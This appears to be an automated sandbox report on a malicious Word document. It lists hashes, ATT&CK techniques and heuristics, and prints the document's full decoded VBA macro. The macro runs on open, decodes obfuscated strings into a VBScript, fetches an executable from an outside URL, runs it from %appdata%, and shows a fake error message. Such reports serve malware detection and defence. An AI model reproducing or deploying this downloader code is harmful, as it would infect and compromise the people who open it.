Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 18bcb5d9d50a52f0…

MALICIOUS

Office (OLE)

89.0 KB Created: 2017-02-16 03:58:00 Authoring application: Microsoft Office Word First seen: 2017-02-27
MD5: 9ae5c585cfc5f3b4dd1df7db14c454d5 SHA-1: e40d66a93a69a431e70abb72b1baf4141895d370 SHA-256: 18bcb5d9d50a52f06b5fd7e14893ecda506e9759301fae9cd05ba39b53df35db
198 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains VBA macros with an AutoOpen function, indicative of malicious intent. The document body explicitly instructs the user to 'Enable Editing' and 'Enable Content', a common lure for macro-based malware. The VBA script contains obfuscated calls to ShellExecute, suggesting it downloads and executes a second-stage payload. The ClamAV detection further confirms its malicious nature.

Heuristics 8

  • ClamAV: Xls.Dropper.Generic-6595971-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Generic-6595971-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
     Close #1
 Shell StrReverse(wmddmlvp("t arstc  /mdc")) & uxtwknagyugbzdmo2, vbHide
 MsgBox StrReverse(wmddmlvp("ceenic luryoe adgrupe asle pt,enntcos hi tadreo  tontidi EalonsiesofPre icff Ovehat us mouY")), vbExclamation
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
iztywso
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Sub
Sub Workbook_Open()
iztywso
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/rights/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5013 bytes
SHA-256: f8a1290fe635bf8c9f9cb6e0188eb41ab0253744056ac5de9559bb2e42be286e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
    Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal ms As LongPtr)
#Else
    Private Declare Sub Sleep Lib "kernel32" (ByVal ms As Long)
#End If

Sub iztywso()

 On Error Resume Next

 Dim iRet As Integer
    
 Dim all As String
 Dim uxtwknagyugbzdmo As String
 Dim uxtwknagyugbzdmo2 As String
 Dim knikhmwv As String
 uxtwknagyugbzdmo = StrReverse(wmddmlvp("nemsvm:\c"))
 uxtwknagyugbzdmo2 = StrReverse(wmddmlvp("bs.vdafkyoe\snmm\vc:"))
 knikhmwv = "'''''''''kftfnvovlldzxmytc"
 Dim lfvdcggajotmoiej As String
 lfvdcggajotmoiej = StrReverse(wmddmlvp("t(ecbjeOatre C =eb wetS")) & Chr(34) & StrReverse(wmddmlvp("TPHTMLrXveer.SL2XMMS")) & Chr(34) & ")" & knikhmwv & RandomString(8) & vbNewLine
lfvdcggajotmoiej = lfvdcggajotmoiej & StrReverse(wmddmlvp("n pe.Oebw")) & Chr(34) & StrReverse(wmddmlvp("ETG")) & Chr(34) & "," & Chr(34) & StrReverse(wmddmlvp("xe.e1hb/lu.ce1icffdoor/w:/tpht")) & Chr(34) & StrReverse(wmddmlvp("seal F,")) & knikhmwv & RandomString(8) & vbNewLine
lfvdcggajotmoiej = lfvdcggajotmoiej & StrReverse(wmddmlvp("ndSeb.we")) & knikhmwv & RandomString(8) & vbNewLine
lfvdcggajotmoiej = lfvdcggajotmoiej & StrReverse(wmddmlvp("dyBoseonspReb.we= d ea_rsyea")) & knikhmwv & RandomString(8) & vbNewLine
lfvdcggajotmoiej = lfvdcggajotmoiej & StrReverse(wmddmlvp("t(ecbjeOatre C =llhehSwst Se")) & Chr(34) & StrReverse(wmddmlvp("llhe.SptriScW")) & Chr(34) & " )" & knikhmwv & RandomString(8) & vbNewLine
lfvdcggajotmoiej = lfvdcggajotmoiej & StrReverse(wmddmlvp("s(ngriStntmeonirnvdEanxp.EllhehSws= e iltFou")) & Chr(34) & StrReverse(wmddmlvp("a%atpdap%")) & Chr(34) & StrReverse(wmddmlvp("& ) ")) & Chr(34) & StrReverse(wmddmlvp("xe.eeiwovkaakk\")) & Chr(34) & knikhmwv & RandomString(8) & vbNewLine
lfvdcggajotmoiej = lfvdcggajotmoiej & StrReverse(wmddmlvp("t(ecbjeOatre=CSOjFobt Se")) & Chr(34) & StrReverse(wmddmlvp("ctjeObemstSyleFig.inptriSc")) & Chr(34) & ")" & knikhmwv & RandomString(8) & vbNewLine
lfvdcggajotmoiej = lfvdcggajotmoiej & StrReverse(wmddmlvp("e)ru,TleFiut(oleFixtTeteeaCrO.FSbj o =leFibj oetS")) & knikhmwv & RandomString(8) & vbNewLine
lfvdcggajotmoiej = lfvdcggajotmoiej & StrReverse(wmddmlvp("d)ea_rsyeag(introSyTarineBplim Steri.WleFibjo")) & knikhmwv & RandomString(8) & vbNewLine
lfvdcggajotmoiej = lfvdcggajotmoiej & StrReverse(wmddmlvp("selo.CleFibjo")) & knikhmwv & RandomString(8) & vbNewLine
lfvdcggajotmoiej = lfvdcggajotmoiej & StrReverse(wmddmlvp("t(ecbjeOatre C =llhejSobt Se")) & Chr(34) & StrReverse(wmddmlvp("onticalipp.AllheS")) & Chr(34) & ")" & knikhmwv & RandomString(8) & vbNewLine
lfvdcggajotmoiej = lfvdcggajotmoiej & StrReverse(wmddmlvp(", leFiut otecuxelEelShl.elShbjo")) & Chr(34) & "" & Chr(34) & "," & Chr(34) & "" & Chr(34) & "," & Chr(34) & "" & Chr(34) & StrReverse(wmddmlvp(" 0,")) & knikhmwv & RandomString(8) & vbNewLine
lfvdcggajotmoiej = lfvdcggajotmoiej & StrReverse(wmddmlvp("y)arin(BngriStTorynaBilempSin ioctunF")) & knikhmwv & RandomString(8) & vbNewLine
lfvdcggajotmoiej = lfvdcggajotmoiej & StrReverse(wmddmlvp(" SI,m Di  ")) & knikhmwv & RandomString(8) & vbNewLine
lfvdcggajotmoiej = lfvdcggajotmoiej & StrReverse(wmddmlvp("y)arin(BnBLeo  T 1 = Ior F ")) & knikhmwv & RandomString(8) & vbNewLine
lfvdcggajotmoiej = lfvdcggajotmoiej & StrReverse(wmddmlvp("))1),  Iy,arin(BdBMiB(sc(Ahr C & S = S   ")) & knikhmwv & RandomString(8) & vbNewLine
lfvdcggajotmoiej = lfvdcggajotmoiej & StrReverse(wmddmlvp("xtNe  ")) & knikhmwv & RandomString(8) & vbNewLine
lfvdcggajotmoiej = lfvdcggajotmoiej & StrReverse(wmddmlvp(" S =ngriStTorynaBilempSi  ")) & knikhmwv & RandomString(8) & vbNewLine
lfvdcggajotmoiej = lfvdcggajotmoiej & StrReverse(wmddmlvp("ontincFud En")) & knikhmwv & RandomString(8) & vbNewLine

 MkDir uxtwknagyugbzdmo
 Sleep 300
 Open uxtwknagyugbzdmo2 For Binary As #1
 Put #1, , lfvdcggajotmoiej
 Close #1
 Shell StrReverse(wmddmlvp("t arstc  /mdc")) & uxtwknagyugbzdmo2, vbHide
 MsgBox StrReverse(wmddmlvp("ceenic luryoe adgrupe asle pt,enntcos hi tadreo  tontidi EalonsiesofPre icff Ovehat us mouY")), vbExclamation
End Sub


Public Function wmddmlvp(Text As String) As String
Dim wtebkbikmnkur As Variant
For wtebkbikmnkur = 1 To Len(Text) Step 2
wmddmlvp = wmddmlvp & StrReverse(Mid(Text, wtebkbikmnkur, 2))
DoEvents
Next wtebkbikmnkur
End Function

Function RandomString(cb As Integer) As String

    Randomize
    Dim rgch As String
    rgch = "abcdefghijklmnopqrstuvwxyz"
    rgch = rgch & UCase(rgch) & "0123456789"

    Dim i As Long
    For i = 1 To cb
        RandomString = RandomString & Mid$(rgch, Int(Rnd() * Len(rgch) + 1), 1)
    Next

End Function



Sub AutoOpen()
iztywso
End Sub
Sub Workbook_Open()
iztywso
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.